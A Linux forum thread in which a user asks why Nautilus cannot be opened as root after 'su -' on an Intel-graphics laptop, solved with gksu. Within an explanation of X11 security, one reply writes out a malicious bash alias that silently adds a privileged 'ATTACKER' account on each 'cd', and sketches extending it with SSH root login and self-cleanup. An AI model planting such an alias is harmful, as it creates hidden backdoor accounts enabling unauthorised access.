You are not logged in.

#1 2012-10-05 11:36:25

siamer
Member
Registered: 2012-04-29
Posts: 132

(SOLVED) intel graphic and no screen

Hi.
My friend bought new laptop with intel gpu. Using gnome 3 everything working fine but... when opening terminal type su - and trying to open nautilus as a root getting error that screen was not found... why ?
I'm using nvidia cards for all my life tongue so I'm not too good with intel tongue

any suggestions how to fix it ? or how to configure that graphic card ?

Last edited by siamer (2012-10-05 12:53:41)

Offline

#2 2012-10-05 11:52:32

hunterthomson
Member
Registered: 2008-06-22
Posts: 794
Website

Re: (SOLVED) intel graphic and no screen

There is no problem with your graphics or screen.

When you use the "-" in then su - root ,or su - otherUser the "-" makes sure to set all of the environment variables to those of the user you are switching too. The user dose not own your X11 screen session, so that user can not open a window to the screen. This is a Security messure, to prevent some attacks, i.e. if someone has the permission level of your current user, they can modify your .profile or .bashrc and input an alias like...,

alias cd="useradd -m -g root -G wheel,audio,video,storage,power,optical,lp,scanner,games -s /bin/bash ATTACKER  >/dev/null 2>&1 ; cd"

NOTE: that command could be cooler, Like set the password, install/re-configure OpenSSH Server to allow root login, use sed then to remove the alias after it is successful.... I'm going to bed now though, so I don't have the time to flesh it out.

You can bypass this security feature by useing the command without the "-" to switch to the other user while keeping your current environment variables, or use sudo.

Last edited by hunterthomson (2012-10-05 12:20:41)


OpenBSD-current Thinkpad X230, i7-3520M, 16GB CL9 Kingston, Samsung 830 256GB
Contributor: linux-grsec

Offline

#3 2012-10-05 12:23:32

karol
Archivist
Registered: 2009-05-06
Posts: 25,427

Re: (SOLVED) intel graphic and no screen

Offline

#4 2012-10-05 12:53:24

siamer
Member
Registered: 2012-04-29
Posts: 132

Re: (SOLVED) intel graphic and no screen

@hunterthomson before it was working with "-" why that I didn't know what's the problem but now even with "su" without "-" is working...
@hunterthomson yes same problem - gksu fixing problem - didn't think about that before...

THANK YOU ! problem solved !

Offline

Board footer

Powered by FluxBB